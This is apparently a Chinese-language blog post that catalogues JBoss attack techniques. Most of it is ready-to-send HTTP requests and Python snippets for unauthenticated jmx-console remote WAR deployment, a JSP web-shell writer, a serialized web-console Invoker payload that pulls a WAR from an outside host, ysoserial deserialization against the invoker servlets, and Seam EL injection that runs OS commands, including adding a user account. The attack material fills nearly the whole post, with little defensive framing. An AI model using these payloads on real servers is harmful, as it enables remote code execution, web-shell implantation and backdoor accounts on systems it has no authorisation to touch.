2020-07-09 | JAVA | UNLOCK

Jboss漏洞总结

漏洞总结

  • jmx-console(HtmlAdaptor)

DeploymentScanner
MainDeployer
DeploymentFileRepository
BSHDeployer

  • web-console

Invoker

  • Deserialize

readonly
JMXInvokerServlet
EJBInvokerServlet

  • seam2

*.seam

jmx-console

[!]jmx-console未授权访问漏洞利用所有模块都有两种传参模式三种请求模式

[!]传参模式(模块名/模块索引)

没什么区别

  • 1.methodName
    &methodName={string(name)}&argType=java.lang.String&arg0={arg0}&argType=java.lang.String&arg1={arg1}...//&argType=java.lang.String&arg{x}={arg}
    使用methodName利用需要传入参数类型 类型不一定是String
    例如DeploymentFileRepository第四个传入的参数就是一个boolean.属性是true 参数名是signxxx

  • 2.methodIndex
    &methodIndex={int(index)}&arg0={arg0}&arg1={arg1}...&arg{x}={argx}
    使用methodIndex利用不需要传入参数类型,直接传入参数的值就行

    [!]请求模式

  • GET
  • POST
  • HEAD

HEAD提一下.
传说CVE-2010-0738
JMX控制台安全验证绕过漏洞可利用HEAD请求绕过jmx-console的验证

把2中传参方式+3种请求模式结合起来每个模块有6种请求方法.
例子:methodIndex传参 喜欢的话可以抓包构造methodName的模式传参

1
2
3
4
5
6
7
GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=2&arg0=http%3A%2F%2F192.168.43.73%2Fspy2.war HTTP/1.1

HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=2&arg0=http%3A%2F%2F192.168.43.73%2Fspy2.war HTTP/1.1

POST /jmx-console/HtmlAdaptor HTTP/1.1

action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=2&arg0=http%3A%2F%2F192.168.43.73%2Fspy2.war

[+]漏洞利用

  • jboss.deployment:type=DeploymentScanner
    DeploymentScanner(jmx-console未授权访问部署WAR)远程WAR定时扫描
1
2
3
POST /jmx-console/HtmlAdaptor HTTP/1.1

action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=7&arg0=http%3A%2F%2F192.168.43.73%2Fspy1.war
1
2
3
import requests

requests.?(target,data="action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=7&arg0=http%3A%2F%2F192.168.43.73%2Fspy1.war")
  • jboss.system:service=MainDeployer
    MainDeployer(jmx-console未授权访问部署WAR)远程WAR
    1
    2
    3
    POST /jmx-console/HtmlAdaptor HTTP/1.1

    action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://192.168.43.73/spy7.war
1
2
3
import requests

requests.?(target,data="action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://192.168.43.73/spy7.war")

跟上面那个没多大区别
jboss.deployment换成jboss.system
DeploymentScanner换成MainDeployer 都属于远程War部署
DeploymentScanner会定期扫描远程War包同步本地War包

  • jboss.system:service=DeploymentFileRepository
    MainDeployer(jmx-console未授权访问部署WAR):传参
1
2
3
POST /jmx-console/HtmlAdaptor HTTP/1.1

action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=s.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%25+if(request.getParameter("f")!%3dnull)(new+java.io.FileOutputStream(application.getRealPath("%2f")%2brequest.getParameter("f"))).write(request.getParameter("t").getBytes())%3b+%25>&argType=boolean&arg4=True

5个参数 1目录名 2shell名 3文件后缀 4文件内容 5登录验证

1
2
3
import requests

requests.?(target,data="action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=s.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%25+if(request.getParameter("f")!%3dnull)(new+java.io.FileOutputStream(application.getRealPath("%2f")%2brequest.getParameter("f"))).write(request.getParameter("t").getBytes())%3b+%25>&argType=boolean&arg4=True")

  • jboss.system:service=BSHDeployer
    BSHDeployer(jmx-console未授权访问部署WAR):BeanShell+Base64
1
2
3
POST /jmx-console/HtmlAdaptor HTTP/1.1

action=invokeOp&name=jboss.deployer%3Aservice%3DBSHDeployer&methodIndex=5&arg0=import+java.io.FileOutputStream%3B+import+sun.misc.BASE64Decoder%3B+String+val+%3D+%22YXNkYXNkYXNk%22%3B+BASE64Decoder+decoder+%3D+new+BASE64Decoder%28%29%3B+String+jboss_home+%3D+System.getProperty%28%22jboss.server.home.dir%22%29%3B+new+File%28jboss_home+%2B+%22%2Fdeploy%2F%22%29.mkdir%28%29%3B+byte%5B%5D+byteval+%3D+decoder.decodeBuffer%28val%29%3B+String+location+%3D+jboss_home+%2B+%22%2Fdeploy%2Fabcdefg.war%22%3B+FileOutputStream+fstream+%3D+new+FileOutputStream%28location%29%3B+fstream.write%28byteval%29%3B+fstream.close%28%29%3B&arg1=cnahcklna.bsh

2个参数 arg0 BeanShell内容 自解包
其中
%22YXNkYXNkYXNk%22中间的Base64需替换为War包压缩过后的Base64字符
%2Fabcdefg.war%22这里是war包名 可以改成自己的

web-console

  • web-console/Invoker

引用A牛
这个Invoker其实就是JMX Invoker,而不局限于Web控制台提供的功能。
默认情况下,访问是不受限制的,所以攻击者可以用它来发送任意的JMX命令到JBoss服务器。

看了下序列化数据里边跟Jboss RMI有关
RemoteMBeanInvocation=>…=>MainDeployer

https://github.com/joaomatosf/jexboss/blob/master/_exploits.py
417 行 def exploit_web_console_invoker(url):

  • 利用方式:

往目标的web-console/Invoker直接POST下面的数据就可以

[!]注意Request.Head

Content-Type :application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
生成/jexws4/jexws4.jsp?ppp=whoami

1
2
3
4
POST /web-console/Invoker HTTP/1.1
Content-Type :application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation

data=data

data(https://github.com/joaomatosf/jexboss/blob/master/_exploits.py)
exploit_web_console_invoker(url):…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
("\xAC\xED\x00\x05\x73\x72\x00\x2E\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x63\x6F\x6E\x73\x6F"
"\x6C\x65\x2E\x72\x65\x6D\x6F\x74\x65\x2E\x52\x65\x6D\x6F\x74\x65\x4D\x42\x65\x61\x6E\x49\x6E\x76"
"\x6F\x63\x61\x74\x69\x6F\x6E\xE0\x4F\xA3\x7A\x74\xAE\x8D\xFA\x02\x00\x04\x4C\x00\x0A\x61\x63\x74"
"\x69\x6F\x6E\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72"
"\x69\x6E\x67\x3B\x5B\x00\x06\x70\x61\x72\x61\x6D\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C"
"\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x5B\x00\x09\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x74"
"\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x10"
"\x74\x61\x72\x67\x65\x74\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x74\x00\x1D\x4C\x6A\x61\x76\x61"
"\x78\x2F\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2F\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x3B"
"\x78\x70\x74\x00\x06\x64\x65\x70\x6C\x6F\x79\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61"
"\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x96\x25\x37\x36\x1A"
"\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\x49\x00\x04\x70\x6F\x72\x74"
"\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x71\x00\x7E\x00\x01\x4C\x00\x04\x66\x69\x6C\x65"
"\x71\x00\x7E\x00\x01\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x01\x4C\x00\x08\x70\x72\x6F\x74"
"\x6F\x63\x6F\x6C\x71\x00\x7E\x00\x01\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x01\x78\x70\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\x74\x00\x0E\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66\x2E\x63\x6F\x6D\x74"
"\x00\x0F\x2F\x72\x6E\x70\x2F\x6A\x65\x78\x77\x73\x34\x2E\x77\x61\x72\x71\x00\x7E\x00\x0B\x74\x00"
"\x04\x68\x74\x74\x70\x70\x78\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53"
"\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74"
"\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x73\x72\x00\x1B\x6A\x61\x76\x61\x78\x2E"
"\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x0F\x03\xA7"
"\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x21\x6A\x62\x6F\x73\x73\x2E\x73\x79\x73\x74\x65"
"\x6D\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x4D\x61\x69\x6E\x44\x65\x70\x6C\x6F\x79\x65\x72\x78")

invoker(反序列化)

  • /invoker/JMXInvokerServlet

    漏洞利用

直接往此路径发送ysoserial payload就行
CommonsCollections1/3/6
Content-Type应该没要求 如果喜欢可以换成
Content-Type :application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation

1
2
3
POST //invoker/JMXInvokerServlet HTTP/1.1

data=CommonsCollections1/3/6

  • /invoker/EJBInvokerServlet

    漏洞利用

直接往此路径发送ysoserial payload就行
CommonsCollections1/3/6
Content-Type应该没要求 如果喜欢可以换成
Content-Type :application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation

1
2
3
POST //invoker/EJBInvokerServlet HTTP/1.1

data=CommonsCollections1/3/6
  • /invoker/readonly

    漏洞利用

直接往此路径发送ysoserial payload就行
CommonsCollections1/3/6
Content-Type应该没要求 如果喜欢可以换成
Content-Type :application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation

1
2
3
POST //invoker/readonly HTTP/1.1

data=CommonsCollections1/3/6

  • invoker/JNDIFactory

[!]利用方式未知

不知道怎么打 应该是可以打

  • /jbossmq-httpil/HTTPServerILServlet

默认关闭 PASS

seam2

  • /admin-console/login.seam

支持 GET/POST/HEAD

seamframework<=2.2
Jboss EL

  • 介绍:

http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html

  • 描述:

要执行任意OS命令,攻击者需要在getDeclaredMethods()方法返回的数组中找到java.lang.Runtime()类的以下2种方法的索引:
1)公共java.lang.Process java.lang.Runtime.exec(java.lang.String)抛出java.io.IOException
2)公共静态java.lang.Runtime java.lang.Runtime.getRuntime()

  • 漏洞利用

通过.getDeclaredMethods()下标找两个报错
响应码302 这两个异常会出现在Response.Headers.Location
public+static+java.lang.Runtime+java.lang.Runtime.getRuntime
public+java.lang.Process+java.lang.Runtime.exec%28java.lang.String%2Cjava.lang.String%5B%5D%29+throws+java.io.IOException
1.找下标 这里就不找了

1
2
3
4
POST /admin-console/login.seam

actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6]}
//完成利用需构造

  1. 反射 直接打
    1
    2
    3
    4
    5
    6
    POST /admin-console/login.seam

    actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('calc')}
    //代码执行
    ...
    actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('net user test qwe123.. /add')}

twiddle

jboss自带twiddle 调用java 利用这个也可以实现未授权远程部署
端口4444 1098 1099
绝路可以用 参考
https://www.cnblogs.com/firstdream/p/5977237.html

参考

https://github.com/joaomatosf/jexboss/
https://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf
https://wooyun.js.org/drops/JBoss%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98%E6%80%BB%E7%BB%93.html(翻译)
https://www.redteam-pentesting.de/files/redteam-jboss.tar.gz

评论加载中